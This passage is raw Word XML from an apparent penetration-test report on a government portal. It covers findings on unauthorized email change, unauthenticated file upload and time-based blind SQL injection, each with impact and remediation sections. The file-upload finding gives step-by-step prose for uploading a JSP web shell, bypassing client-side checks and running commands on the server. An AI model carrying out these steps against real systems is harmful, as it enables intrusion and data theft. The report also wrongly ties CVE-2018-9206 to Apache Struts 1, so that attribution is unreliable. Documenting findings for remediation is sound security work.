        <w:t xml:space="preserve">Web Application with a standard user account. 2. Navigate to the profile settings or account management section where email modification functionality is typically found. (If </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> direct UI, identify the backend endpoint for email update, e.g., /portal/updateEmail.do). 3. Intercept the HTTP request sent to modify the email address using a web proxy tool (e.g., Burp Suite). 4. Observe the request parameters, which may include the current email, new email, and potentially a user ID. 5. Modify the '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new_email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">' parameter to a different email address (e.g., attacker@example.com). 6. Forward the modified request to the server. 7. Verify that the email address associated with the account in the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">portal has been successfully updated, despite the organizational policy requiring this action via the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IDM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A2FA8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D31933" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-project-top-ten/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A72DA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/863.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D94C6F3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/vuln/detail/CVE-2023-28157</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA12322" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/vuln/detail/CVE-2007-6202</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CD9470" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C4524C"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44E51D7D"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2695FDA2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Unauthenticated Arbitrary File Upload (CVE-2018-9206)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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63300964" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CRITICAL CVSS 9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24A92E49"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5525A3F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9617340"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A8F11B9" w14:textId="723F13F5"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-018</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DA7DE3E"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05CA11" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="5ECD5AB5"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0107155"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D8969B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A08:2021-Software and Data Integrity Failures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D169225"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5F18D7A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-434</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1CE3E48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71DC659"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C4EE9B9"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A692A30"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F842DF5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0D16576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DC2BE52"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30C413B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Immediate</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82F4E92"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9E62495" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0AD8BE3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D23B3DB"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DB79D31"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8164954"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07DDE7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6AC3E87E"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805E88C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4250" w:type="pct"/>
            <w:gridSpan w:val="3"/>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tcPr>
          <w:p w14:paraId="55B70EE9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>https://nvd.nist.gov/vuln/detail/CVE-2018-9206</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78BB2088" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDBFDCA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>An unauthenticated arbitrary file upload vulnerability exists within the government portal, specifically identified as CVE-2018-9206 affecting Apache Struts 1. This flaw allows an attacker to upload files of any type to the server without requiring any authentication. By exploiting this vulnerability, an attacker can upload malicious web shells, scripts, or executables to the web server's accessible directories. This grants the attacker the ability to execute arbitrary code on the server, potentially leading to full system compromise, data manipulation, or denial of service. The vulnerability is typically due to insufficient validation of file types, content, and filenames, combined with inadequate access controls on the upload functionality and storage locations. The Struts 1 framework, being End-of-Life, exacerbates this risk as no official patches are available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA3F5F1" w14:textId="04360361" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1EE3F0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This critical vulnerability poses a severe threat to the organization's operations and reputation. A successful exploit could lead to complete compromise of the government portal and underlying systems, resulting in significant financial losses through incident response, forensic investigations, and system rebuilds. From a regulatory perspective, a data breach stemming from this vulnerability would constitute a severe violation of NIST CSF requirements, potentially leading to substantial penalties and legal repercussions. The public disclosure of such an incident would severely damage public trust and the organization's reputation, potentially eroding confidence in government services. Furthermore, attackers could manipulate or exfiltrate sensitive citizen data, compromising data integrity and confidentiality across critical government functions. The lack of proper controls in an unauthenticated context means any external threat actor can initiate this attack with minimal effort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B294E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750C7B3C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):Migrate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the End-of-Life Apache Struts 1 framework to a currently supported, secure web framework. Implement a secure file upload architecture that strictly separates file upload functionality from critical application logic and sensitive data. Utilize a dedicated, isolated storage solution (e.g., object storage or a secure network file share) for uploaded files, ensuring these files are not served directly from the web application server's document root. Implement a robust content delivery network (CDN) or a dedicated media server for serving static content, including legitimate uploads, after thorough scanning and validation. Establish a comprehensive secure development lifecycle (SDLC) that incorporates security reviews, threat modeling, and static/dynamic application security testing (SAST/DAST) for all new and updated features, especially those involving file uploads. TACTICAL FIX (Code Implementation</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement strict server-side validation for all uploaded files, including filename, file extension, file size, and MIME type. Only allow a whitelist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>of explicitly permitted file extensions and MIME types relevant to the application's function (e.g., .jpg, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, .pdf).- Validate the actual content of uploaded files using file signature analysis (magic bytes) to prevent malicious files from being disguised with legitimate extensions.- Rename uploaded files to a cryptographically strong random string or hash upon upload to prevent path traversal and overwrite attacks. Do not use user-supplied filenames.- Store uploaded files outside of the web root directory and ensure that direct access to the upload directory is prevented through web server configuration (e.g., by disabling execution permissions or using access control lists).- Scan all uploaded files for malware using an integrated antivirus solution before storage and processing.- Apply the principle of least privilege to the directory where files are stored, ensuring that the web server process has only write permissions and no execute permissions.- Implement robust authentication and authorization checks for all file upload functionalities, even if the current vulnerability is unauthenticated (as a defense-in-depth measure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE0AE32" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1887A8AE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Identify the file upload endpoint on the target government portal. This might be a form or an API endpoint used for uploading user profiles, documents, or other content.2. Craft a malicious file, such as a web shell (e.g., a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, or .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> file containing server-side code), designed to execute arbitrary commands on the server. For a Struts 1 application, a JSP web shell would be appropriate.3. Intercept the file upload request using a web proxy tool (e.g., Burp Suite).4. Modify the intercepted request to bypass any client-side validations (e.g., changing the file extension in the Content-Disposition header if only certain extensions are allowed).5. Send the modified request to upload the malicious file to the server.6. Once the file is successfully uploaded, attempt to access it directly via a web browser using the presumed path where uploaded files are stored.7. Execute commands through the uploaded web shell to confirm arbitrary code execution on the server. This could involve listing directory contents, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reading</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sensitive files (e.g., configuration files), or executing system commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275EE012" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC6E99A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/vuln/detail/CVE-2018-9206</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FCBBB2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/434.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B97428" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A9E9DE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="267D9A21"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36D5C51E"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3B8EAB78" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>SQL Injection - Time-Based Blind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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6B54FF5F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CRITICAL CVSS 9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41F7CF10"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2CC71A4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ACF775F"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4235A31" w14:textId="4ABC43ED"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-008</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B47EC1B"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139ADA3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1E00CA2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D4834B7"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61B344A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A03:2021-Injection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CB1AC42"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72A54B7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7D9AF51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F58BDB9"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731D7A"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D3E9ECC"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65ECAE9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="5E97BAA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CB9E9F2"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350BA5C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Immediate</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B0A4646"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4369FA8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="30296261"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DE0BBEF"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196B829"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E23CBF1"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E53CE98" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EAFEFD1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8FF0D3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A time-based blind SQL Injection vulnerability was identified in the government portal. This type of SQL Injection occurs when the application is vulnerable to SQL Injection but does not directly return the results of the query within the application's response. Instead, an attacker can infer information about the database by causing delays or different responses based on true or false conditions evaluated by the database. By observing the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> it takes for the application to respond, an attacker can systematically extract data, character by character, from the database. This technique is particularly effective when standard error-based or union-based SQL Injection methods are not viable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7316CEED" w14:textId="6AF900A0" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0D591A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A successful time-based blind SQL Injection attack can lead to severe consequences for the government portal. Unauthorized individuals could gain complete access to sensitive government data, including personally identifiable information (PII) of citizens, confidential operational data, and classified information. This directly violates NIST CSF principles regarding data confidentiality and integrity. The financial implications could be substantial, encompassing costs for incident response, forensic investigations, data breach notifications, and potential regulatory fines. Beyond monetary losses, the damage to public trust and the government's reputation would be catastrophic, eroding citizen confidence in the security of their data and government services. Data integrity could be compromised through unauthorized modification or deletion, leading to unreliable information for critical government functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14200FCB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0A8DF4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture</w:t>
      </w:r>
